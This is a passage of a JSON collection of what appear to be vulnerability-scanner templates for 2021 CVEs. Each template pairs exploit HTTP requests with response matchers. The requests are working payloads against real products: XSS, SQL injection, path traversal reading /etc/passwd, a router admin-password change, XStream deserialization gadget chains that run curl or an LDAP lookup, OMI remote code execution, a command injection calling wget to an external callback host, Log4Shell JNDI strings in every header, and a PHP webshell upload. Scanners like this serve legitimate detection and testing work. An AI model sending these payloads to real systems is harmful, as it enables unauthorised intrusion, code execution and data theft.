Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/elementor/assets/js/frontend.min.js","{{BaseURL}}/#elementor-action:action=lightbox&settings=eyJ0eXBlIjoibnVsbCIsImh0bWwiOiI8c2NyaXB0PmFsZXJ0KCd4c3MnKTwvc2NyaXB0PiJ9"],"req-condition":true,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["compare_versions(version, '> 1.5.0', '< 3.1.4') && status_code_1 == 200 && status_code_2 == 200"]},{"type":"regex","part":"body_1","regex":["elementor[\\s-]*v(([0-3]+\\.(([0-5]+\\.[0-5]+)|[0-4]+\\.[0-9]+))|[0-2]+[0-9.]+)"]}],"extractors":[{"type":"regex","name":"version","group":1,"regex":["elementor[\\s-]*v(([0-3]+\\.(([0-5]+\\.[0-5]+)|[0-4]+\\.[0-9]+))|[0-2]+[0-9.]+)"],"internal":true},{"type":"kval","kval":["version"]}]}]},{"id":"CVE-2021-20158","info":{"name":"Trendnet AC2600 TEW-827DRU 2.08B01 - Admin Password Change","severity":"critical"},"requests":[{"raw":["POST /apply_sec.cgi HTTP/1.1\nHost: {{Hostname}}\n\nccp_act=set&action=tools_admin_elecom&html_response_page=dummy_value&html_response_return_page=dummy_value&method=tools&admin_password={{password}}\n","POST /apply_sec.cgi HTTP/1.1\nHost: {{Hostname}}\n\nhtml_response_page=%2Flogin_pic.asp&login_name=YWRtaW4%3D&log_pass={{base64(password)}}&action=do_graph_auth&login_n=admin&tmp_log_pass=&graph_code=&session_id=\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["setConnectDevice","setInternet","setWlanSSID","TEW-827DRU"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24227","info":{"name":"Patreon WordPress  <1.7.0 - Unauthenticated Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/?patron_only_image=../../../../../../../../../../etc/passwd&patreon_action=serve_patron_only_image"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24997","info":{"name":"WordPress Guppy <=1.1 - Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-json/guppy/v2/load-guppy-users?userId=1&offset=0&search="],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"guppyUsers\":","\"userId\":","\"type\":"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-31195","info":{"name":"Microsoft Exchange Server - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/owa/auth/frowny.aspx?app=people&et=ServerError&esrc=MasterPage&te=\\&refurl=}}};alert(document.domain)//"],"matchers-condition":"and","matchers":[{"type":"word","words":["alert(document.domain)//&et=ServerError","mail/bootr.ashx"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[500]}]}]},{"id":"CVE-2021-39144","info":{"name":"XStream 1.4.18  - Remote Code Execution","severity":"high"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/xml\n\n<java.util.PriorityQueue serialization='custom'>\n  <unserializable-parents/>\n  <java.util.PriorityQueue>\n    <default>\n      <size>2</size>\n    </default>\n    <int>3</int>\n    <dynamic-proxy>\n      <interface>java.lang.Comparable</interface>\n      <handler class='sun.tracing.NullProvider'>\n        <active>true</active>\n        <providerType>java.lang.Comparable</providerType>\n        <probes>\n          <entry>\n            <method>\n              <class>java.lang.Comparable</class>\n              <name>compareTo</name>\n              <parameter-types>\n                <class>java.lang.Object</class>\n              </parameter-types>\n            </method>\n            <sun.tracing.dtrace.DTraceProbe>\n              <proxy class='java.lang.Runtime'/>\n              <implementing__method>\n                <class>java.lang.Runtime</class>\n                <name>exec</name>\n                <parameter-types>\n                  <class>java.lang.String</class>\n                </parameter-types>\n              </implementing__method>\n            </sun.tracing.dtrace.DTraceProbe>\n          </entry>\n        </probes>\n      </handler>\n    </dynamic-proxy>\n    <string>curl http://{{interactsh-url}}</string>\n  </java.util.PriorityQueue>\n</java.util.PriorityQueue>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: curl"]}]}]},{"id":"CVE-2021-40822","info":{"name":"Geoserver - Server-Side Request Forgery","severity":"high"},"requests":[{"raw":["POST /geoserver/TestWfsPost HTTP/1.1\nHost: oast.pro\nContent-Type: application/x-www-form-urlencoded\n\nform_hf_0=&url=http://oast.pro/geoserver/../&body=&username=&password=\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<b>Interactsh</b>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-27320","info":{"name":"Doctor Appointment System 1.0 - SQL Injection","severity":"high"},"requests":[{"raw":["@timeout: 10s\nPOST /contactus.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nfirstname=test'+AND+(SELECT+6133+FROM+(SELECT(SLEEP(6)))nOqb)+AND+'RiUU'='RiUU&lastname={{randstr}}&email={{randstr}}%40test.com&comment={{randstr}}&submit=Send+Us\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 500","contains(body, \"Medical Management System\")"],"condition":"and"}]}]},{"id":"CVE-2021-40978","info":{"name":"MKdocs 1.2.2 - Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:[x*]:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-38647","info":{"name":"Microsoft Open Management Infrastructure - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /wsman HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/soap+xml;charset=UTF-8\n\n<s:Envelope\n  xmlns:s=\"http://www.w3.org/2003/05/soap-envelope\"\n  xmlns:a=\"http://schemas.xmlsoap.org/ws/2004/08/addressing\"\n  xmlns:n=\"http://schemas.xmlsoap.org/ws/2004/09/enumeration\"\n  xmlns:w=\"http://schemas.dmtf.org/wbem/wsman/1/wsman.xsd\"\n  xmlns:xsi=\"http://www.w3.org/2001/XMLSchema\"\n  xmlns:h=\"http://schemas.microsoft.com/wbem/wsman/1/windows/shell\"\n  xmlns:p=\"http://schemas.microsoft.com/wbem/wsman/1/wsman.xsd\">\n  <s:Header>\n    <a:To>HTTP://{{Hostname}}/wsman/</a:To>\n    <w:ResourceURI s:mustUnderstand=\"true\">http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem</w:ResourceURI>\n    <a:ReplyTo>\n      <a:Address s:mustUnderstand=\"true\">http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous</a:Address>\n    </a:ReplyTo>\n    <a:Action>http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem/ExecuteScript</a:Action>\n    <w:MaxEnvelopeSize s:mustUnderstand=\"true\">102400</w:MaxEnvelopeSize>\n    <a:MessageID>uuid:00B60932-CC01-0005-0000-000000010000</a:MessageID>\n    <w:OperationTimeout>PT1M30S</w:OperationTimeout>\n    <w:Locale xml:lang=\"en-us\" s:mustUnderstand=\"false\"/>\n    <p:DataLocale xml:lang=\"en-us\" s:mustUnderstand=\"false\"/>\n    <w:OptionSet s:mustUnderstand=\"true\"/>\n    <w:SelectorSet>\n      <w:Selector Name=\"__cimnamespace\">root/scx</w:Selector>\n    </w:SelectorSet>\n  </s:Header>\n  <s:Body>\n    <p:ExecuteScript_INPUT\n      xmlns:p=\"http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem\">\n      <p:Script>aWQ=</p:Script>\n      <p:Arguments/>\n      <p:timeout>0</p:timeout>\n      <p:b64encoded>true</p:b64encoded>\n    </p:ExecuteScript_INPUT>\n  </s:Body>\n</s:Envelope>\n"],"matchers":[{"type":"word","words":["<p:StdOut>","uid=0(root) gid=0(root) groups=0"],"condition":"and"}]}]},{"id":"CVE-2021-27519","info":{"name":"FUDForum 3.1.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?SQ=0&srch=x\"+onmouseover%3Dalert%281%29+x%3D\"&t=search&btn_submit.x=0&btn_submit.y=0"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["highlightSearchTerms(\"x\" onmouseover=alert(1) x=\"\");"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24285","info":{"name":"WordPress Car Seller - Auto Classifieds Script - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\naction=request_list_request&order_id=1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x717a767671,0x685741416c436654694d446d416f717a6b54704a457a5077564653614970664166646654696e724d,0x7171786b71),NULL-- -\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["qzvvqhWAAlCfTiMDmAoqzkTpJEzPwVFSaIpfAfdfTinrMqqxkq"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-3019","info":{"name":"ffay lanproxy Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/../conf/config.properties"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/octet-stream"],"condition":"and"},{"type":"word","part":"body","words":["config.admin.username","config.admin.password"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-25003","info":{"name":"WordPress WPCargo Track & Trace <6.9.0 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /wp-content/plugins/wpcargo/includes/{{randstr}}.php HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-content/plugins/wpcargo/includes/barcode.php?text=x1x1111x1xx1xx111xx11111xx1x111x1x1x1xxx11x1111xx1x11xxxx1xx1xxxxx1x1x1xx1x1x11xx1xxxx1x11xx111xxx1xx1xx1x1x1xxx11x1111xxx1xxx1xx1x111xxx1x1xx1xxx1x1x1xx1x1x11xxx11xx1x11xx111xx1xxx1xx11x1x11x11x1111x1x11111x1x1xxxx&sizefactor=.090909090909&size=1&filepath={{randstr}}.php HTTP/1.1\nHost: {{Hostname}}\n","POST /wp-content/plugins/wpcargo/includes/{{randstr}}.php?1=var_dump HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n2={{md5(num)}}\n"],"req-condition":true,"matchers":[{"type":"dsl","dsl":["status_code_1 != 200","status_code_2 == 200","status_code_3 == 200","contains(body_3, md5(num))","contains(body_3, 'PNG')"],"condition":"and"}]}]},{"id":"CVE-2021-40971","info":{"name":"Spotweb <= 1.5.1 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["POST /install.php?page=4 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nsettingsform[newpassword1]=pdteam'+onclick='alert(document.domain)\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["onclick='alert(document.domain)","Spotweb"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-42663","info":{"name":"Sourcecodester Online Event Booking and Reservation System 2.3.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nname={{username}}&pwd={{password}}\n","GET /views/index.php?msg=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</i><script>alert(document.domain)</script></div>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24146","info":{"name":"WordPress Modern Events Calendar Lite <5.16.5 - Sensitive Information Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin.php?page=MEC-ix&tab=MEC-export&mec-ix-action=export-events&format=csv"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["mec-events","text/csv"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24917","info":{"name":"WordPress WPS Hide Login <1.9.1 - Information Disclosure","severity":"high"},"requests":[{"raw":["GET /wp-admin/options.php HTTP/1.1\nHost: {{Hostname}}\nReferer: something\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["!contains(tolower(location), 'wp-login.php')"]},{"type":"word","part":"header","words":["redirect_to=%2Fwp-admin%2Fsomething&reauth=1"]}],"extractors":[{"type":"kval","kval":["location"]}]}]},{"id":"CVE-2021-38540","info":{"name":"Apache Airflow - Unauthenticated Variable Import","severity":"critical"},"requests":[{"raw":["GET /login/ HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\n","POST /variable/varimport HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryB874qcjbpxTP1Hj7\nReferer: {{RootURL}}/admin/variable/\n\n------WebKitFormBoundaryB874qcjbpxTP1Hj7\nContent-Disposition: form-data; name=\"csrf_token\"\n\n{{csrf}}\n------WebKitFormBoundaryB874qcjbpxTP1Hj7\nContent-Disposition: form-data; name=\"file\"; filename=\"{{randstr}}.json\"\nContent-Type: application/json\n\n{\n    \"type\": \"{{randstr}}\"\n}\n\n------WebKitFormBoundaryB874qcjbpxTP1Hj7--\n"],"cookie-reuse":true,"req-condition":true,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(body_1, \"Sign In\")","status_code_2 == 302","contains(header_2, \"session=.\")"],"condition":"and"},{"type":"word","words":["You should be redirected automatically to target URL: <a href=\"/\">"]}],"extractors":[{"type":"regex","name":"csrf","group":1,"regex":["type=\"hidden\" value=\"(.*?)\">"],"internal":true}]}]},{"id":"CVE-2021-36380","info":{"name":"Sunhillo SureLine <8.7.0.1.1 - Unauthenticated OS Command Injection","severity":"critical"},"requests":[{"raw":["POST /cgi/networkDiag.cgi HTTP/1.1\nHost: {{Hostname}}\n\ncommand=2&ipAddr=&dnsAddr=$(wget+http://{{interactsh-url}})&interface=0&netType=0&scrFilter=&dstFilter=&fileSave=false&pcapSave=false&fileSize=\n"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2021-3293","info":{"name":"emlog 5.3.1 Path Disclosure","severity":"medium"},"requests":[{"raw":["GET /t/index.php?action[]=aaaa HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["<b>Warning</b>","on line","expects parameter"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24165","info":{"name":"WordPress Ninja Forms <3.4.34 - Open Redirect","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/admin-ajax.php?client_id=1&redirect=https://interact.sh&action=nf_oauth_connect HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"req-condition":true,"matchers":[{"type":"dsl","dsl":["status_code_1 == 302","status_code_2 == 302","contains(header_2, 'Location: https://interact.sh?client_id=1')"],"condition":"and"}]}]},{"id":"CVE-2021-39141","info":{"name":"XStream 1.4.18  - Remote Code Execution","severity":"high"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/xml\n\n<java.util.PriorityQueue serialization='custom'>\n  <unserializable-parents/>\n  <java.util.PriorityQueue>\n    <default>\n      <size>2</size>\n    </default>\n    <int>3</int>\n    <dynamic-proxy>\n      <interface>java.lang.Comparable</interface>\n      <handler class='com.sun.xml.internal.ws.client.sei.SEIStub'>\n        <owner/>\n        <managedObjectManagerClosed>false</managedObjectManagerClosed>\n        <databinding class='com.sun.xml.internal.ws.db.DatabindingImpl'>\n          <stubHandlers>\n            <entry>\n              <method>\n                <class>java.lang.Comparable</class>\n                <name>compareTo</name>\n                <parameter-types>\n                  <class>java.lang.Object</class>\n                </parameter-types>\n              </method>\n              <com.sun.xml.internal.ws.client.sei.StubHandler>\n                <bodyBuilder class='com.sun.xml.internal.ws.client.sei.BodyBuilder$DocLit'>\n                  <indices>\n                    <int>0</int>\n                  </indices>\n                  <getters>\n                    <com.sun.xml.internal.ws.client.sei.ValueGetter>PLAIN</com.sun.xml.internal.ws.client.sei.ValueGetter>\n                  </getters>\n                  <accessors>\n                    <com.sun.xml.internal.ws.spi.db.JAXBWrapperAccessor_-2>\n                      <val_-isJAXBElement>false</val_-isJAXBElement>\n                      <val_-getter class='com.sun.xml.internal.ws.spi.db.FieldGetter'>\n                        <type>int</type>\n                        <field>\n                          <name>hash</name>\n                          <clazz>java.lang.String</clazz>\n                        </field>\n                      </val_-getter>\n                      <val_-isListType>false</val_-isListType>\n                      <val_-n>\n                        <namespaceURI/>\n                        <localPart>hash</localPart>\n                        <prefix/>\n                      </val_-n>\n                      <val_-setter class='com.sun.xml.internal.ws.spi.db.MethodSetter'>\n                        <type>java.lang.String</type>\n                        <method>\n                          <class>javax.naming.InitialContext</class>\n                          <name>doLookup</name>\n                          <parameter-types>\n                            <class>java.lang.String</class>\n                          </parameter-types>\n                        </method>\n                      </val_-setter>\n                      <outer-class>\n                        <propertySetters>\n                          <entry>\n                            <string>serialPersistentFields</string>\n                            <com.sun.xml.internal.ws.spi.db.FieldSetter>\n                              <type>[Ljava.io.ObjectStreamField;</type>\n                              <field>\n                                <name>serialPersistentFields</name>\n                                <clazz>java.lang.String</clazz>\n                              </field>\n                            </com.sun.xml.internal.ws.spi.db.FieldSetter>\n                          </entry>\n                          <entry>\n                            <string>CASE_INSENSITIVE_ORDER</string>\n                            <com.sun.xml.internal.ws.spi.db.FieldSetter>\n                              <type>java.util.Comparator</type>\n                              <field>\n                                <name>CASE_INSENSITIVE_ORDER</name>\n                                <clazz>java.lang.String</clazz>\n                              </field>\n                            </com.sun.xml.internal.ws.spi.db.FieldSetter>\n                          </entry>\n                          <entry>\n                            <string>serialVersionUID</string>\n                            <com.sun.xml.internal.ws.spi.db.FieldSetter>\n                              <type>long</type>\n                              <field>\n                                <name>serialVersionUID</name>\n                                <clazz>java.lang.String</clazz>\n                              </field>\n                            </com.sun.xml.internal.ws.spi.db.FieldSetter>\n                          </entry>\n                          <entry>\n                            <string>value</string>\n                            <com.sun.xml.internal.ws.spi.db.FieldSetter>\n                              <type>[C</type>\n                              <field>\n                                <name>value</name>\n                                <clazz>java.lang.String</clazz>\n                              </field>\n                            </com.sun.xml.internal.ws.spi.db.FieldSetter>\n                          </entry>\n                          <entry>\n                            <string>hash</string>\n                            <com.sun.xml.internal.ws.spi.db.FieldSetter>\n                              <type>int</type>\n                              <field reference='../../../../../val_-getter/field'/>\n                            </com.sun.xml.internal.ws.spi.db.FieldSetter>\n                          </entry>\n                        </propertySetters>\n                        <propertyGetters>\n                          <entry>\n                            <string>serialPersistentFields</string>\n                            <com.sun.xml.internal.ws.spi.db.FieldGetter>\n                              <type>[Ljava.io.ObjectStreamField;</type>\n                              <field reference='../../../../propertySetters/entry/com.sun.xml.internal.ws.spi.db.FieldSetter/field'/>\n                            </com.sun.xml.internal.ws.spi.db.FieldGetter>\n                          </entry>\n                          <entry>\n                            <string>CASE_INSENSITIVE_ORDER</string>\n                            <com.sun.xml.internal.ws.spi.db.FieldGetter>\n                              <type>java.util.Comparator</type>\n                              <field reference='../../../../propertySetters/entry[2]/com.sun.xml.internal.ws.spi.db.FieldSetter/field'/>\n                            </com.sun.xml.internal.ws.spi.db.FieldGetter>\n                          </entry>\n                          <entry>\n                            <string>serialVersionUID</string>\n                            <com.sun.xml.internal.ws.spi.db.FieldGetter>\n                              <type>long</type>\n                              <field reference='../../../../propertySetters/entry[3]/com.sun.xml.internal.ws.spi.db.FieldSetter/field'/>\n                            </com.sun.xml.internal.ws.spi.db.FieldGetter>\n                          </entry>\n                          <entry>\n                            <string>value</string>\n                            <com.sun.xml.internal.ws.spi.db.FieldGetter>\n                              <type>[C</type>\n                              <field reference='../../../../propertySetters/entry[4]/com.sun.xml.internal.ws.spi.db.FieldSetter/field'/>\n                            </com.sun.xml.internal.ws.spi.db.FieldGetter>\n                          </entry>\n                          <entry>\n                            <string>hash</string>\n                            <com.sun.xml.internal.ws.spi.db.FieldGetter reference='../../../../val_-getter'/>\n                          </entry>\n                        </propertyGetters>\n                        <elementLocalNameCollision>false</elementLocalNameCollision>\n                        <contentClass>java.lang.String</contentClass>\n                        <elementDeclaredTypes/>\n                      </outer-class>\n                    </com.sun.xml.internal.ws.spi.db.JAXBWrapperAccessor_-2>\n                  </accessors>\n                  <wrapper>java.lang.Object</wrapper>\n                  <bindingContext class='com.sun.xml.internal.ws.db.glassfish.JAXBRIContextWrapper'/>\n                  <dynamicWrapper>false</dynamicWrapper>\n                </bodyBuilder>\n                <isOneWay>false</isOneWay>\n              </com.sun.xml.internal.ws.client.sei.StubHandler>\n            </entry>\n          </stubHandlers>\n          <clientConfig>false</clientConfig>\n        </databinding>\n        <methodHandlers>\n          <entry>\n            <method reference='../../../databinding/stubHandlers/entry/method'/>\n            <com.sun.xml.internal.ws.client.sei.SyncMethodHandler>\n              <owner reference='../../../..'/>\n              <method reference='../../../../databinding/stubHandlers/entry/method'/>\n              <isVoid>false</isVoid>\n              <isOneway>false</isOneway>\n            </com.sun.xml.internal.ws.client.sei.SyncMethodHandler>\n          </entry>\n        </methodHandlers>\n      </handler>\n    </dynamic-proxy>\n    <string>ldap://{{interactsh-url}}/#evil</string>\n  </java.util.PriorityQueue>\n</java.util.PriorityQueue>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"body","words":["timestamp","com.thoughtworks.xstream"],"condition":"or"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[500]}]}]},{"id":"CVE-2021-24335","info":{"name":"WordPress Car Repair Services & Auto Mechanic Theme <4.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/car1/estimateresult/result?s=&serviceestimatekey=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-27905","info":{"name":"Apache Solr <=8.8.1 - Server-Side Request Forgery","severity":"critical"},"requests":[{"raw":["GET /solr/admin/cores?wt=json HTTP/1.1\nHost: {{Hostname}}\nAccept-Language: en\nConnection: close\n","GET /solr/{{core}}/replication/?command=fetchindex&masterUrl=https://interact.sh HTTP/1.1\nHost: {{Hostname}}\nAccept-Language: en\nConnection: close\n"],"matchers":[{"type":"word","part":"body","words":["<str name=\"status\">OK</str>"]}],"extractors":[{"type":"regex","name":"core","group":1,"regex":["\"name\"\\:\"(.*?)\""],"internal":true}]}]},{"id":"CVE-2021-21816","info":{"name":"D-Link DIR-3040 1.13B03 - Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/messages"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["syslog:","admin","/etc_ro/lighttpd/www"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-37704","info":{"name":"phpfastcache - phpinfo Resource Exposure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/vendor/phpfastcache/phpfastcache/docs/examples/phpinfo.php","{{BaseURL}}/vendor/phpfastcache/phpfastcache/examples/phpinfo.php"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","words":["PHP Extension","PHP Version"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","group":1,"regex":[">PHP Version <\\/td><td class=\"v\">([0-9.]+)"],"part":"body"}]}]},{"id":"CVE-2021-29441","info":{"name":"Nacos <1.4.1 - Authentication Bypass","severity":"critical"},"requests":[{"raw":["POST /nacos/v1/cs/configs?dataId=nacos.cfg.dataIdfoo&group=foo&content=helloWorld HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n","POST /nacos/v1/cs/configs?dataId=nacos.cfg.dataIdfoo&group=foo&content=helloWorld HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nUser-Agent: Nacos-Server\n"],"req-condition":true,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["status_code_1 == 403","status_code_2 == 200"],"condition":"and"},{"type":"dsl","dsl":["contains(body_1, 'Forbidden')","body_2 == 'true'"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]}]}]},{"id":"CVE-2021-21801","info":{"name":"Advantech R-SeeNet - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/php/device_graph_page.php?graph=%22zlo%20onerror=alert(1)%20%22"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"zlo onerror=alert(1) \"","Device Status Graph"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-44228","info":{"name":"Apache Log4j2 Remote Code Injection","severity":"critical"},"requests":[{"raw":["GET /?x=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.uri.{{interactsh-url}}/a} HTTP/1.1\nHost: {{Hostname}}\n","GET / HTTP/1.1\nHost: {{Hostname}}\nAccept: application/xml, application/json, text/plain, text/html, */${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.accept.{{interactsh-url}}}\nAccept-Encoding: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.acceptencoding.{{interactsh-url}}}\nAccept-Language: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.acceptlanguage.{{interactsh-url}}}\nAccess-Control-Request-Headers: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.accesscontrolrequestheaders.{{interactsh-url}}}\nAccess-Control-Request-Method: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.accesscontrolrequestmethod.{{interactsh-url}}}\nAuthentication: Basic ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.authenticationbasic.{{interactsh-url}}}\nAuthentication: Bearer ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.authenticationbearer.{{interactsh-url}}}\nCookie: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.cookiename.{{interactsh-url}}}=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.cookievalue.{{interactsh-url}}}\nLocation: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.location.{{interactsh-url}}}\nOrigin: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.origin.{{interactsh-url}}}\nReferer: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.referer.{{interactsh-url}}}\nUpgrade-Insecure-Requests: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.upgradeinsecurerequests.{{interactsh-url}}}\nUser-Agent: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.useragent.{{interactsh-url}}}\nX-Api-Version: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.xapiversion.{{interactsh-url}}}\nX-CSRF-Token: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.xcsrftoken.{{interactsh-url}}}\nX-Druid-Comment: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.xdruidcomment.{{interactsh-url}}}\nX-Forwarded-For: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.xforwardedfor.{{interactsh-url}}}\nX-Origin: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.xorigin.{{interactsh-url}}}\n"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"regex","part":"interactsh_request","regex":["\\d{6}\\.([a-zA-Z0-9\\.\\-]+)\\.([a-z0-9]+)\\.([a-z0-9]+)\\.([a-z0-9]+)\\.\\w+"]}],"extractors":[{"type":"kval","kval":["interactsh_ip"]},{"type":"regex","group":2,"regex":["\\d{6}\\.([a-zA-Z0-9\\.\\-]+)\\.([a-z0-9]+)\\.([a-z0-9]+)\\.([a-z0-9]+)\\.\\w+"],"part":"interactsh_request"},{"type":"regex","group":1,"regex":["\\d{6}\\.([a-zA-Z0-9\\.\\-]+)\\.([a-z0-9]+)\\.([a-z0-9]+)\\.([a-z0-9]+)\\.\\w+"],"part":"interactsh_request"}]}]},{"id":"CVE-2021-21234","info":{"name":"Spring Boot Actuator Logview Directory 